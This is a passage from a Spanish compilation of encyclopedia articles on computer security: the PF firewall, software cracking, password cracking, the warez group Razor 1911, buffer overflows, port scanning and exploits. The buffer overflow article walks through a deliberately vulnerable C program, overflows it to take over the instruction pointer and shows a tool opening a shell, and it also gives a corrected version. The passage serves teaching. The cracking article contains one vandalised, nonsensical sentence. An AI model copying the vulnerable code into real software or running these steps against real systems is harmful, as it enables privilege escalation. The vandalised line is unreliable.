la de IPFilter, aunque se modificó para hacerla másclara y legible. La traducción de direcciones de red (NAT) y calidad del servicio (QoS) se integraron perfectamenteen PF, para permitir mayor flexibilidad. Se alcanzó el QoS integrando colas alternativas (ALTQ) en el propio PF.PF puede utilizarse para montar dispositivos cortafuegos de gran flexibilidad, ya que incluye características de AltaDisponibilidad, como pfsync y un protocolo de redundancia para direcciones comunes (CARP), authpf (Identificadorde sesión), un proxy ftp y otros extras relacionados con PF.

Page 58: Virus informático

PF (software) 56

PortesPF se desarrolla como parte del sistema base de OpenBSD. Pese a ello, ha sido portado con éxito a otros sistemas.FreeBSD lo fue adoptando paulatinamente, primero como paquete y desde la versión FreeBSD 5.3 como una de lostres subsistemas de filtrado que ofrece el núcleo. Existe una versión de FreeBSD, denominada pfSense, que incluyeuna sofisticada interfaz gráfica para editar relgas de PF.También se ha portado PF a NetBSD 3.0 por itojun y aparece en DragonFlyBSD desde la versión 1.2. Pese a algunosintentos, PF no ha podido ser portado con éxito a Linux, probablemente por las profundas diferencias entre la pila dered de los núcleos BSD y el de Linux.

Comandos y opciones• pfctl -e -> activa PF• pfctl -d -> desactiva PF• pfctl -f <archivo> -> si no aparecen errores de sintaxis en <archivo>, se cargan reglas nuevas en PF

Ejemplo de un archivo pf.conf## Macros

# Interfaz interna (conectada a la red local).

int_if="xl0"

## Opciones

# Se ajusta la política por defecto para devolver RSTs o ICMPs para tráfico bloqueado

set block-policy return

# Ignorar la interfaz loopback por completo.

set skip on lo0

## Reglas de reenrutado

# El tráfico NAT en la interfaz englobada dentro del grupo por defecto de interfaz egress

# (al que se asigna la interfaz de salida de la ruta por defecto) desde la red local

nat on egress from $int_if:network to any -> (egress)

## Reglas de filtrado

# Regla de denegación por defecto, todos los paquetes bloqueados registrados en log

block log all

# Pasa todo el tráfico desde y hacia la red local, utilizando quick para que

# después no se evalúen las reglas para este caso. Algunas reglas restringirán el

# tráfico local mucho más.

pass quick on $int_if all

# Permite la salida de todo el tráfico, manteniendo el estado para que las respuestas

# pasen automáticamente. Muchas reglas tendrán aquí más reglas, restringiendo el

Page 59: Virus informático

PF (software) 57

# tráfico de entrada y salida en la interfaz externa (egress).

pass out keep state

RegistroEl registro PF se configura por reglas dentro de pf.conf. Los logs se manejan en el formato binario de tcpdump/pcap.Se puede acceder a los logs a través del pseudodispositivo de red llamado 'pflog' mediante una utilidad comotcpdump. Alternativamente la utilidad 'pflogd' puede recoger y colocar logs en el archivo binario de log/var/log/pflog, que también puede manejarse con tcpdump, Ethereal y otras aplicaciones similares.El formato tcpdump/pcap ha sido modificado ligeramente para archivar las estadísticas de reglas del firewall, estadosde paso/bloqueo, interfaces utilizadas, información que sólo está disponible con utilidades que tienen en cuenta estacodificación particular, incluyendo las versiones recientes de tcpdump y Ethereal.

Enlaces externos• Guía del PF de OpenBSD [1]

• Canción del OpenBSD [2] con información de transfondo acerca de la creación de PF.• Sección de PF en la web de Daniel Hartmeier [3]

• Tutorial de PF por Peter N. M. Hansteen [4] (Inglés)

Referencias[1] http:/ / www. openbsd. org/ faq/ pf/[2] http:/ / www. openbsd. org/ lyrics. html#36[3] http:/ / www. benzedrine. cx/ pf. html[4] http:/ / home. nuug. no/ ~peter/ pf/

Page 60: Virus informático

Cracking (software) 58

Cracking (software)El cracking es la modificación del software con la intención de eliminar los métodos de protección de los cuales estedisponga: protección de copias, versiones de prueba, números de serie, claves de hardware, verificación de fechas,verificación de CD o publicidad y adware.La distribución y uso de copias modificadas es ilegal en casi todos los países desarrollados. Muchos juicios se hanllevado a cabo debido al cracking de software; sin embargo, la mayoría de estos han tenido que ver con ladistribución de copias duplicadas en vez de con el proceso de quebrantar la protección, debido a la dificultdad deconstruir pruebas válidas de culpabilidad individual en el segundo caso. En Estados Unidos, la aprobación de laDigital Millennium Copyright Act (DMCA) declaró a la modificación de software, así como a la distribución deinformación que habilita el cracking de software, ilegal. Sin embargo, la ley ha sido apenas probada en el poderjudicial de EE. UU. en casos de ingeniería inversa para único uso personal. La Unión Europea aprobó la Directiva dela Unión Europea sobre derecho de autor en mayo de 2001, haciendo la infracción de los derechos de autor desoftware ilegal en los estados miembros, una vez que la legislación nacional fuera promulgada en favor de ladirectiva.

Crack informáticoUn crack informático es un parche cuya finalidad es la de modificar el comportamiento del software original ycreado sin autorización del desarrollador del programa.Debido al aumento de la piratería a nivel mundial, las grandes empresas del software aplican una serie derestricciones sobre las copias que se distribuyen con la finalidad de prevenir la copia indiscriminada de susprogramas. Los cracks eliminan esas restricciones.

Finalidades

Activar software gratuitamentePara prevenir la instalación del software sin autorización, así como su correspondiente utilización, a menudo seemplean claves únicas para cada programa que no se pueden violar usando un keygen normal (generador de clavesde activación). Para evitar esta limitacion, los crackers modifican el programa en si para que una clave falsa puedaser utilizada, o simplemente se omita el paso de verificación y el software quede completamente activado y listo parausar. Esta clase de crack hace creer al programa que existe un funcionamiento correcto en el sistema antipirateriacuando en verdad no es así.Normalmente es el archivo más importante del programa (fichero principal ejecutable) es el que previene lautilización de forma ilegal de cracks, aunque la protección puede estar aplicada en varios archivos. Al sustituir estospor versiones modificadas se logra eludir esa protección.Los desarrolladores de software han creado nuevos sistemas para comprobar la integridad de los archivos e impedirla piratería. Pese a ello, muchos programadores logran evadir la protección anti-cracking. y quiatr la kk del seguroala de unos de otros y se leiste esto es por que sos un nob

Page 61: Virus informático

Crack informático 59

Autenticar software fraudulentoTambién se utiliza para impedir que un software instalado ilegalmente sea detectado como fraudulento. El principalejemplo son los archivos de autenticación de Windows o WGA, los cuales detectan si el Windows es legal o ilegal ydan una alarma al usuario. Estos archivos pueden reemplazarle por unos previamente alterados y dar el mensaje alservidor de Microsoft de que la copia de Windows es original.

Liberar limitaciones o periodos de pruebaDebido al crecimiento de la industria del software, es habitual la distribución de versiones de prueba (shareware)quepermiten su uso por tiempo limitado y/o con funcionalidad reducida, dando la posibilidad de comprar el programacompleto y así desbloquear sus funciones. Aplicado sobre estas versiones, el crack elimina los límites impuestos porel fabricante.

DistribuciónLa distribución de cracks, números de serie (serials) y keygen se realiza tanto a través de redes P2P a nivel mundial,como por vía web (mediante descargas directas) o grupos de noticias. Algunos de estos cracks pueden ser en realidadsoftware malintencionado que puede incorporar vulnerabilidades al programa original o contener virus o troyanoscamuflados, lo cual puede provocar serios daños a un computador, hasta que incluso tambíen puede convertir uncomputador en parte de una botnet.Aun así, es frecuente que los antivirus detecten un crack como malware sin que este lo sea puesto que es unprograma destinado a realizar cambios en el software de otro creador.

CrackerEl término cracker (del inglés cracker, romper) se utiliza para referirse a las personas que rompen algún sistema deseguridad.[] Los crackers pueden estar motivados por una multitud de razones, incluyendo fines de lucro, protesta, opor el desafío.[1]

HistoriaA partir de 1980 había aparecido la cultura hacker, programadores aficionados o personas destacadas o con unimportante conocimiento de informatica. Estos programadores no solían estar del lado de la ilegalidad, y aunquealgunos conocían técnicas para violar sistemas de seguridad, se mantenían dentro del ámbito legal. Pero con eltiempo surgieron personas que utilizando su conocimiento en informática, aprovechaban debilidades o errores dealgunos sistemas informáticos y los crackeaban, es decir, burlaban el sistema de seguridad muchas veces entrandoen la ilegalidad y algunos considerando estas prácticas como "malas". A estas personas se las continuó llamandohackers, por lo que alrededor de 1985 los hackers "originales" empezaron a llamarlos crackers en contraposición altérmino hacker, en defensa de éstos últimos por el uso incorrecto del término.[] Por ello los crackers son criticadospor la mayoría de hackers, por el desprestigio que les supone ante la opinión pública y las empresas ya que muchasveces, inclusive en los medios de comunicación, no hacen diferencia entre el término hacker y cracker creandoconfusión sobre la definición de los mismos y aparentando un significado diferente.

Page 62: Virus informático

Cracker 60

Distintos usos del términoSe suele referir a una persona como cracker cuando:• Mediante ingeniería inversa realiza: seriales, keygens y cracks, los cuales sirven para modificar el

comportamiento ampliar la funcionalidad del software o hardware original al que se aplican, y se los suele utilizarpara saltearse restricciones como por ejemplo que un programa deje de funcionar a un determinado tiempo, o quesólo funcione si es instalado desde un CD original, etc.

• Viola la seguridad de un sistema informático y, por ejemplo, toma control de este, obtiene información, borradatos, etc.

En ambos casos dichas prácticas suelen ser ilegales y penadas por la ley.

LegalidadMuchos programas informáticos, usualmente los privativos, no permiten la modificación o estudio delfuncionamiento del programa, esto hace que el hecho de realizar ingeniería inversa para poder generar un serial o uncrack sea ilegal. En ocasiones el cracking es la única manera de realizar cambios sobre software para el que sufabricante no presta soporte, especialmente cuando lo que se quiere es, o corregir defectos, o exportar datos a nuevasaplicaciones, en estos casos en la mayoría de legislaciones no se considera el cracking como actividadilegal,[cita requerida] incluso a veces la empresa que desarrolló el software ya no existe o ya no posee los derechossobre el producto.A su vez cuando una persona penetra en un sistema ajeno sin su autorización, se comete una violación a la propiedadprivada[cita requerida], se suele dar el ejemplo de que es ilegal entrar sin permiso a la casa de otra persona, por más deque la puerta esté abierta. Aunque también las tácticas utilizadas por los crackers para violar los sistemas deseguridad suelen ser utilizadas por empresas de seguridad informática u otras personas para testear la seguridad deun programa o computadora, en dicho caso como se tiene el permiso para realizar el "ataque" o bien, es el mismodueño de la computadora el que lo realiza, ya no es una práctica ilegal y entraría en disputa también el uso deltérmino cracker para dichos actos, por esto se han creado diversas leyes que tratan de solucionar estas diferencias.

Referencias

Enlaces externos• CrackZ's Reverse Engineering Page (1997-2005) (http:/ / www. woodmann. com/ crackz/ index. html) (en inglés)

Page 63: Virus informático

Password cracking 61

Password crackingEl password cracking es un proceso informático que consiste en descifrar la contraseña de determinadasaplicaciones elegidas por el usuario. Se busca codificar los códigos de cifrado en todos los ámbitos de la informática.Se trata del rompimiento o desciframiento de claves (passwords).Con los métodos de cifrado de hoy en día se hace más difícil el descifrado de claves. En cifrados modernos, comoMD5, resulta imposible encontrar una coherencia lógica entre el texto cifrado y el descifrado, ya que cada clave hasido generada a partir de una cadena diferente llamada "semilla". Así han tenido que evolucionar los sistemas derotura de claves (hasta el uso de las increíbles "rainbow tables"), buscando no encontrar una coherencia lógica, sinoel cifrado de nuevas cadenas con las que se guarde similitud con el texto cifrado, siendo una tarea ardua y querequiere, habitualmente, un buen equipo para romperlas (algunas pueden tardar incluso años en romperse).

Razor 1911

Razor 1911

Acrónimo RZR

Tipo warez / demo

Fundación 1985

Fundador(es) Doctor NoInsane TTMSector9

Sede Noruega

Ámbito Mundial

Sitio web Razor 1911 [1]

Razor 1911 (RZR) es un grupo de warez y de demos, con una historia similar a la de Fairlight. Según la división dedelitos informáticos del Departamento de Justicia de los Estados Unidos, Razor 1911 es la "red de piratería desoftware de juegos más antigua de Internet".[2]

HistoriaEl grupo fue fundado originalmente como Razor 2992 por el Doctor No, Insane TTM y Sector9 en Noruega enoctubre de 1985 como grupo de cracking para Commodore 64. Poco después, se cambió de 2992 a 1911 como undardo a otros crackers que tendían a sobreutilizar el número 666 (el sufijo "1911" se traduce a 777 en hexadecimal).Entre 1987 y 1988 el grupo comenzó a alejarse de la Commodore 64 y emigraron a una nueva plataforma dehardware, codificando demos y crackeando juegos para Amiga. En la década de los noventa, Razor 1911experimentó otra transición, esta vez a IBM PC.Razor era el grupo dominante de suministro desde 1992 hasta que los disquetes fueron abandonados por los CD-ROM. A lo largo de la década de los noventa Razor se encuentran con la competencia de muchos grupos diferentes, con grupos como TRSi, El Dream Team (TDT) y Fairlight (FLT), Prestige e Hybrid (HBD). Podría decirse por esa época, Razor fue revitalizado por la incorporación de nuevos miembros procedentes de otro grupo,

Page 64: Virus informático

Razor 1911 62

Nexus, que trajeron con ellos algunos proveedores de Reino Unido y los líderes del Speed Racer (TSR), Hot Tuna yLThe Gecko. En Razor también había un puñado de otros líderes durante el decenio de 1990, como Zodact, TheRenegade Chemist (CVR), el Rey Brujo, Butcher, Marauder, y Randall Flagg.En 1995 los disquetes son suplantados rápidamente por los CD-ROM, por lo que Razor 1911 se trasladó a la escenade ripeado de CD-ROM. Aunque no es la primera en comenzar con el ripeo, Razor tuvo mucho éxito y se convirtióen uno de los grupos predominantes. La tripulación que llevó Razor en este nuevo capítulo incluye miembros como:TSR, Faraón, Error Fatal, tercer hijo, La_Plaga, Hot Tuna, Beowulf, Pitbull, Bunter, Manhunter, Vitas, y ThePunisher. Razor dominó el panorama hasta que Prestige se formó, la cual posteriormente se fusionaría con Class(CLS), que serían una fuerte competencia de Razor.Razor, una vez más, asumió un nuevo desafío cuando la escena de la ISO se formó. Liderado por The Punisher,Razor comenzó su recuperación. Tras la jubilación de The Punisher, Razor fue dirigido por diferentes personas ysufrió algunos problemas internos de liderazgo. Esto se resolvió cuando Pitbull, un antiguo miembro de Razor en losnoventa, asumió el rol. Él era aún líder cuando tuvo lugar la Operación bucanero, una operación internacional delucha contra la piratería que afectó a este grupo entre otros.Actualmente Razor ha sido amenazado por Ubisoft, de que si llegaran a hacer un crack de Assassin's Creed 2 leharían investigar con el FBI. De este modo Razor no pudo lanzar un crack de Assasin's Creed 2, por lo que lo hizoSkidrow, transformándose en su principal competencia debido al lanzamiento de cracks más rápidos, por eso Razorha perdido un poco de popularidad.

Miembros arrestadosShane Pitman E. de 31 años de edad, de Conover, Carolina del Norte. Uno de los líderes de Razor 1911 conocido porel pseudónimo de "Pitbull", fue condenado a 18 meses en la cárcel "por conspiración para violar leyes de derechosde autor" como parte de la Operación bucanero.[3]

Sean Michael Breen de 38 años de edad, de Richmond, California. Uno de los líderes de Razor 1911 desdecomienzos de la década de los noventa. Fue condenado 10 de febrero de 2004 a 50 meses de prisión y tres años delibertad vigilada. Es la pena más larga impuesta hasta la fecha a las más de 40 personas en todo el mundo afectadospor la Operación bucanero.

RetornoCasi exactamente en la fecha en la que Sean Michael Breen fue puesto en libertad, Razor 1911 comenzó nuevamentela liberación de juegos. Desde entonces, han seguido liberando juegos de forma constante, y actualmente parece seruno de los grupos de cracking más prolíficos.Shane Pitman ya no participa con el grupo y tiene un papel prominente en los foros populares Neowin.net.

LogrosEl 23 de julio de 1996, Razor 1911 lanzó Quake el día después de su lanzamiento.El 14 de octubre de 2006, Razor 1911 lanzó Battlefield 2142 a la escena cinco días antes de su lanzamiento oficial.En 2007, Razor 1911 fue el primer grupo con éxito en crackear un juego exclusivo de Windows Vista, Shadowrun,para que se ejecutase en Windows XP. Este hecho apoyó la creencia de que Microsoft está tratando de publicar lamayoría de los juegos nuevos para Vista únicamente con el fin de impulsar las ventas de su sistema operativo.El 11 de noviembre de 2007, Razor 1911 crackeó y liberó la versión europea de Crysis cinco días antes de su fechade lanzamiento oficial.El 7 de diciembre de 2008, Razor 1911 publicó Grand Theft Auto IV, cinco días después de su lanzamiento. En elproceso se logró romper la protección SecuROM.

Page 65: Virus informático

Razor 1911 63

El 25 de mayo de 2009, Los Sims 3 fue publicado, ocho días antes de su lanzamiento.El 20 de noviembre de 2009, Razor 1911 fue el primero en liberar otra vez Left 4 Dead 2.El 21 de enero del 2010 Mass Effect 2 fue publicado, 5 días antes de su lanzamiento.El 8 de febrero de 2010, Razor 1911 lanzo Bioshock 2, un día antes del lanzamiento oficial del juego.El 24 de febrero del 2010 y varios dias antes de su puesta a la venta Napoleon: Total War sale publicado en la red.El 2 de marzo de 2010, Razor 1911 lanzó Supreme Commander 2, el mismo día después del lanzamiento oficial deljuego.El 4 de marzo del 2010 y 9 dias antes de su salida oficial, Battlefield Bad Company 2 sale publicado en la red.El 21 de septiembre del 2010 y 3 dias antes de su salida oficial, F1 2010 sale publicado en la red.El 16 de noviembre de 2010, un dia antes de su salida oficial, Harry Potter y las Reliquias de la Muerte - Parte 1(videojuego) sale publicado en la red.El 6 de diciembre de 2010, Razor 1911 anuncio que alojarían en su web un espejo de WikiLeaks,wikileaks.razor1911.com [4].[5]

Referencias[1] http:/ / www. razor1911. com/[2] Former Leader of Razor 1911, the Oldest Game Software Piracy Ring on the Internet, Sentenced (http:/ / www. cybercrime. gov/ pitmanSent.

htm)[3] Shane Pitman conocido como Pitbull (http:/ / www. defacto2. net/ groups/ razor1911/ pitbull. htm)[4] http:/ / wikileaks. razor1911. com/

Desbordamiento de búferEn seguridad informática y programación, un desbordamiento de buffer (del inglés buffer overflow o bufferoverrun) es un error de software que se produce cuando un programa no controla adecuadamente la cantidad de datosque se copian sobre un área de memoria reservada a tal efecto (buffer), de forma que si dicha cantidad es superior ala capacidad preasignada los bytes sobrantes se almacenan en zonas de memoria adyacentes, sobrescribiendo sucontenido original. Esto constituye un fallo de programación.En las arquitecturas comunes de computadoras no existe separación entre las zonas de memoria dedicadas a datos ylas dedicadas a programa, por lo que los bytes que desbordan el buffer podrían grabarse donde antes habíainstrucciones, lo que implicaría la posibilidad de alterar el flujo del programa, llevándole a realizar operacionesimprevistas por el programador original. Esto es lo que se conoce como una vulnerabilidad.Una vulnerabilidad puede ser aprovechada por un usuario malintencionado para influir en el funcionamiento delsistema. En algunos casos el resultado es la capacidad de conseguir cierto nivel de control saltándose las limitacionesde seguridad habituales. Si el programa con el error en cuestión tiene privilegios especiales constituye en un fallograve de seguridad.Se denomina shellcode al código ejecutable especialmente preparado que se copia al host objeto del ataque paraobtener los privilegios del programa vulnerable.La capacidad de los procesadores modernos para marcar zonas de memoria como protegidas puede usarse paraaminorar el problema. Si se produce un intento de escritura en una zona de memoria protegida se genera unaexcepción del sistema de acceso a memoria, seguido de la terminación del programa. Por desgracia para que estatécnica sea efectiva los programadores han de indicar al sistema operativo las zonas que se necesita proteger,programa a programa y rutina a rutina, lo que supone un problema para todo el código heredado.

Page 66: Virus informático

Desbordamiento de búfer 64

Descripción técnicaUn desbordamiento de búffer ocurre cuando los datos que se escriben en un búffer corrompen aquellos datos endirecciones de memoria adyacentes a los destinados para el búffer, debido a una falta de validación de los datos deentrada. Esto se da comúnmente al copiar cadenas de caracteres de un búffer a otro.

Ejemplo básicoEn este ejemplo, un programa tiene definidos dos elementos de datos continuos en memoria: un buffer de 8 bytestipo string, A, y otro de dos bytes tipo entero, B. Al comienzo, A contiene bytes nulos y B contiene el número 3(cada carácter se representa mediante un byte).

0 0 0 0 0 0 0 0 0 3

Buffer A Buffer B

A continuación, el programa intenta almacenar la cadena de caracteres "demasiado" en el buffer A, seguido de bytesnulos para marcar el fin de string. Al no validarse la longitud de la cadena, se sobrescribe el valor de B:

'd' 'e' 'm' 'a' 's' 'i' 'a' 'd' 'o' 0

Buffer A Buffer B

A pesar de que el programador no quería cambiar el contenido del búffer B, el valor de éste ha sido reemplazado porun número equivalente a parte de la cadena de caracteres. Para este ejemplo, en un sistema big-endian que useASCII, el carácter 'o' seguido del byte nulo equivale al número 28416.Si B fuese la única variable aparte de A definida en el programa, la escritura de datos que sobrepasen los límites de Bgenerarían un error como segmentation fault, concluyendo así el programa.

Código fuente de ejemploEn el siguiente ejemplo se presenta un código fuente en C con un error de programación. Una vez compilado, elprograma generará un desbordamiento de buffer si se lo invoca desde la línea de comandos con un argumento losuficientemente grande, pues este argumento se usa para llenar un buffer, sin validar previamente su longitud.[1]

/* overflow.c - demuestra un desbordamiento de buffer */

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[])

{

char buffer[10];

if (argc < 2)

{

fprintf(stderr, "MODO DE USO: %s string\n", argv[0]);

return 1;

}

strcpy(buffer, argv[1]);

return 0;

}

Page 67: Virus informático

Desbordamiento de búfer 65

Strings de 9 caracteres o menos no provocarán desbordamiento de buffer. Por el contrario, strings de 10 caracteres omás, sí: Esto siempre es incorrecto, aunque no siempre resultará en un error del programa o segmentation fault.Este programa puede reescribirse en forma más segura usando la función strncpy de la siguiente manera:[1]

/* mejor.c - demuestra un método de resolver el problema */

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[])

{

char buffer[10];

if (argc < 2)

{

fprintf(stderr, "MODO DE USO: %s string\n", argv[0]);

return 1;

}

strncpy(buffer, argv[1], sizeof(buffer));

buffer[sizeof(buffer) - 1] = '\0';

return 0;

}

Historia de abusosUno de los primeros aprovechamientos de los que hay registro de desbordamiento de búfers fue en 1988. Fue uno delos muchos que usó el gusano Morris para propagarse en Internet. El programa abusado fue un servicio de Unixllamado fingerd.[2]

Más tarde, en 1995, Thomas Lopatic redescubrió en forma independiente el desbordamiento de búfer y publicó susdescubrimientos en la lista de correo sobre seguridad Bugtraq.[3] Un año después, en 1996, Elias Levy (conocidotambién como Aleph One) publicó en la revista Phrack su artículo "Smashing the Stack for Fun and Profit",[4] unaintroducción paso a paso para aprovecharse de vulnerabilidades de desbordamientos de búfer basados en la pila.Desde entonces, por lo menos dos de los gusanos más importantes de Internet se han aprovechado de losdesbordamientos de búfer para comprometer un gran número de sistemas. En 2001, el gusano Code Red seaprovechó de un desbordamiento de búfer en el Internet Information Services (IIS) 5.0 de Microsoft[5] y en 2003 elgusano SQL Slammer comprometió máquinas corriendo Microsoft SQL Server 2000.[6]

Stack smashingEl pisado de pila o stack smashing es un tipo de desbordamiento de buffer que es aprovechado por algunos virus yotros programas maliciosos para tomar control sobre una aplicación, o provocar su terminación. Esto sucede cuando,por algún error imprevisto, se ingresa a la pila de la aplicación más datos que los que ésta puede contener, lo queprovoca que esta se "desborde" y algunos datos se sobreescriban. Para evitar que suceda esto, los compiladores semejoran cada día dejándole tiempo al programador para pensar en lo que realmente importa.La siguiente sería una explicación de qué es, cómo se hace y cómo se previene el desbordamiento de pila, con elvalor agregado de posibilitar una nueva herramienta que nos ayudará a explicar errores de programación. Elsiguiente ejemplo está inspirado en la funcionalidad incluida en el nuevo compilador por defecto de la distribuciónDebian (en su versión inestable):Miremos, primero que nada, un ejemplo. Este es un ejemplo común de un programa C vulnerable:

Page 68: Virus informático

Desbordamiento de búfer 66

#include <stdio.h>

#include <string.h>

int main( int argc, char *argv[] )

{

// Buffer estático en la pila.

char buffer[1024];

if ( argc != 2 )

{

printf("Uso: %s argumento\n", argv[0] );

return( -1 );

}

// Copiado de cadenas sin control.

strcpy( buffer, argv[1]);

printf( "Argumento copiado\n" );

return(0);

}

Este programa simple acepta un argumento y lo copia a un buffer estático. Este es un error de programación clásico,si este programa fuese compilado a un ejecutable setuid/setgid (ejecutable por cualquiera como si fuese el dueño)permitiría a un atacante ganar permisos fácilmente.Como vamos a demostrar las nuevas funciones del nuevo compilador, asegúrense de compilar el ejemplo anteriorcon gcc-3.3 de la siguiente forma:

user@pc:/tmp$ gcc-3.3 -o buggy buggy.c

Veamos ahora si lo podemos romper. Primero dos pruebas de ejecución.

user@pc:/tmp$ /tmp/buggy

Uso: /tmp/buggy argumento

user@pc:/tmp$ /tmp/buggy test

Argumento copiado

Ambas ejecuciones funcionaron como se esperaba. Ahora probemos pasarle un argumento más largo para ver sipodemos desbordar el buffer estático:

user@pc:/tmp$ ./buggy `perl -e 'print "X"x2048'`

Argumento copiado

Violación de segmento

Tuvimos éxito: desbordamos el buffer con nuestro argumento de 2k, lo que resultó en una violación de segmento.Ahora, si podemos producir un archivo de núcleo podríamos debuguearlo:

user@pc:/tmp$ ulimit -c 09999999

user@pc:/tmp$ ./buggy `perl -e 'print "X"x3333'`

Argumento copiado

Violación de segmento (con archivo de núcleo)

Al correr gdb podremos ver el programa:

user@pc:/tmp$ gdb ./buggy core

GNU gdb 6.4.90-debian

...

Page 69: Virus informático

Desbordamiento de búfer 67

El programa finalizó con señal 11, Violación de segmento

#0 0x58585858 in ?? ()

(gdb) info registers eip

eip 0x58585858 0x58585858

Aquí podemos ver que el puntero de instrucciones - registro del procesador que indica qué será lo que se ejecutará acontinuación es 0×58585858 (0×58 es ‘X’ en hexadecimal). Esto significa que efectivamente tomamos el control delejecutable con nuestro script malicioso.El explotar el ejecutable para correr una línea de comandos habiendo hecho esto es trivial y, por lo general, puede serautomatizado:

user@pc:~/cmd-overflow$ make

gcc-3.3 -o cmd-overflow -Wall -ggdb cmd-overflow.c

gcc-3.3 -o cmd-vuln -Wall -ggdb cmd-vuln.c

user@pc:~/cmd-overflow$ ./cmd-overflow --target=/tmp/buggy --args='%' --size=2048

Argumento copiado

shell-3.1$ id

uid=1000(user) gid=1000(user) groups=29(audio), 44(video), 46(plugdev), 100(users), 1000(user)

shell-3.1$ exit

exit

Utilizamos aquí un simple programa para crear un argumento de 2048 bytes de longitud que contiene el códigorequerido para correr una línea de comandos, y luego corrimos nuestro programa defectuoso con este argumentoconstruido a medida.Se desbordó el buffer al correr nuestro código, lo que resultó en la ejecución de una línea de comandos. Si nuestroprograma hubiese sido ejecutado en Linux en setuid por un super-usuario ¡¡hubiésemos ganado los privilegios delsúper-usuario!!

Referencias[1][1] Safer C: Developing Software for High-integrity and Safety-critical Systems (ISBN 0-07-707640-0)[2] "Tour del gusano" por Donn Seeley, Universidad de Utah (http:/ / world. std. com/ ~franl/ worm. html)[3] Bugtraq security mailing list (http:/ / www. security-express. com/ archives/ bugtraq/ 1995_1/ 0403. html)[4] "Smashing the Stack for Fun and Profit" by Aleph One (http:/ / doc. bughunter. net/ buffer-overflow/ smash-stack. html)[5] eEye Digital Security (http:/ / www. eeye. com/ html/ Research/ Advisories/ AL20010717. html)[6] Microsft Technet Security Bulletin MS02-039 (http:/ / www. microsoft. com/ technet/ security/ bulletin/ ms02-039. mspx)

Page 70: Virus informático

Escáner de puertos 68

Escáner de puertosEl término escáner de puertos o escaneo de puertos se emplea para designar la acción de analizar por medio de unprograma el estado de los puertos de una máquina conectada a una red de comunicaciones. Detecta si un puerto estáabierto, cerrado, o protegido por un cortafuegos.Se utiliza para detectar qué servicios comunes está ofreciendo la máquina y posibles vulnerabilidades de seguridadsegún los puertos abiertos. También puede llegar a detectar el sistema operativo que está ejecutando la máquinasegún los puertos que tiene abiertos. Es usado por administradores de sistemas para analizar posibles problemas deseguridad, pero también es utilizado por usuarios malintencionados que intentan comprometer la seguridad de lamáquina o la red.Existen varios programas escaneadores de puertos por la red. Uno de los más conocidos es Nmap, disponible tantopara Linux como Windows.

Rastreo de puertos TCP SYN scanPara establecer una conexión normal TCP, es necesario seguir una negociación de tres pasos. Esta negociación esiniciada con un paquete SYN en la máquina de origen, al que la máquina de destino corresponde con un paqueteSYN/ACK, que es finalmente respondido por la máquina que inicia la conexión por un paquete ACK. Una vez quese han cumplido estos pasos, está hecha la conexión TCP.Un rastreador de puertos envía muchos paquetes SYN a la máquina que se está probando, y mira de qué formaregresan los paquetes para ver el estado de los puertos en el destino, interpretándolos de la siguiente forma:- Si al enviar un paquete SYN a un puerto específico, el destino devuelve un SYN/ACK, el puerto está abierto yescuchando conexiones.- En otro caso, si regresa un paquete RST, el puerto está cerrado.- Por último, si no regresa el paquete, o si se recibe un paquete ICMP Port Unreachable, el puerto está filtrado poralgún tipo de cortafuegos.Haciendo este procedimiento para una lista de puertos conocidos, se logra obtener un informe de estado de lospuertos de la máquina probada.

Rastreo de puertos UDPAunque el protocolo UDP no está orientado a la conexión, es posible realizar un escaneo. No tiene un paquete SYNcomo el protocolo TCP, sin embargo si un paquete se envía a un puerto que no está abierto, responde con un mensajeICMP Port Unreachable. La mayoría de los escáners de puertos UDP usan este método, e infieren que si no hayrespuesta, el puerto está abierto. Pero en el caso que esté filtrado por un firewall, este método dará una informaciónerrónea.Una opción es enviar paquetes UDP de una aplicación específica, para generar una respuesta de la capa deaplicación. Por ejemplo enviar una consulta DNS.

Page 71: Virus informático

Escáner de puertos 69

Escáneres de puertos en línea• Listado de escáners [1]

• Zona gratuita [2]

• Puertos Abiertos [3] En español, por grupos o personalizados. (Seguridad, Troyanos y servers)• ADSLZone [4]

• Sygate Online Scan [5] extended security check (Stealth Scan, Trojan Scan)• Crucialtests [6] concise, incl. advisor (actualmente no esta en linea)• AuditMyPC Free Port Scanning [7] Can scan all 65535 ports.

Referencias[1] http:/ / www. adslayuda. com/ test-scan. html[2] http:/ / www. zonagratuita. com/ servicios/ seguridad/ scan-online. html[3] http:/ / www. puertosabiertos. com/[4] http:/ / www. adslzone. net/ scanpuertos. html[5] http:/ / scan. sygate. com/[6] http:/ / www. crucialtests. com/[7] http:/ / www. auditmypc. com/ freescan/ scanoptions. asp

ExploitExploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, fragmento de datos o secuencia decomandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema deinformación para conseguir un comportamiento no deseado del mismo. Ejemplos de comportamiento erróneo:Acceso de forma no autorizada, toma de control de un sistema de cómputo, consecución privilegios no concedidoslícitamente, consecución de ataques de denegación de servicio. Hay que observar que el término no se circunscribe apiezas de software, por ejemplo cuando lanzamos un ataque de ingeniería social, el ardit o discurso que preparamospara convencer a la víctima también se considera un exploit.[1]

Lo exploits pueden tomar forma en distintos tipos de software, como por ejemplo scripts, virus informáticos ogusanos informáticos,

ClasificaciónSegún la forma en la que el exploit contacta con el software vulnerable:[2]

• Exploit remoto.- Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Porejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.

• Exploit local.- Si para ejecutar el exploit se necesita tener antes acceso a el sistema vulnerable. Por ejemplo elexploit puede aumentar los privilegios del que lo ejecuta. Este tipo de exploits también puede ser utilizado por unatacante remoto que ya tiene acceso a la máquina local mediante un exploit remoto.

• Exploit ClientSide.[1]- Aprovechan vulnerabilidades de aplicaciones que típicamente están instaladas en granparte de las estaciones de trabajo de las organizaciones. Ejemplos típicos de este tipo de software son aplicacionesofimáticas (Ej. Microsoft Office, Open Office), lectores de PDF (Ej. Adobe Acrobat Reader), navegadores (Ej.Internet Explorer, Firefox, Chrome, Safari), reproductores multimedia (Ej. Windows Media Player, Winamp,iTunes). El exploit está dentro de ficheros interpretados por este tipo de aplicaciones y que llega a la máquinaobjetivo por distintos medios (Ej email o pendrive). El archivo será usado por el programa y si no es detenido porningún otro programa (Ej. firewall o antivirus) aprovechará la vulnerabilidad de seguridad. Las peculiaridades deeste tipo de ataques son:

Page 72: Virus informático

Exploit 70

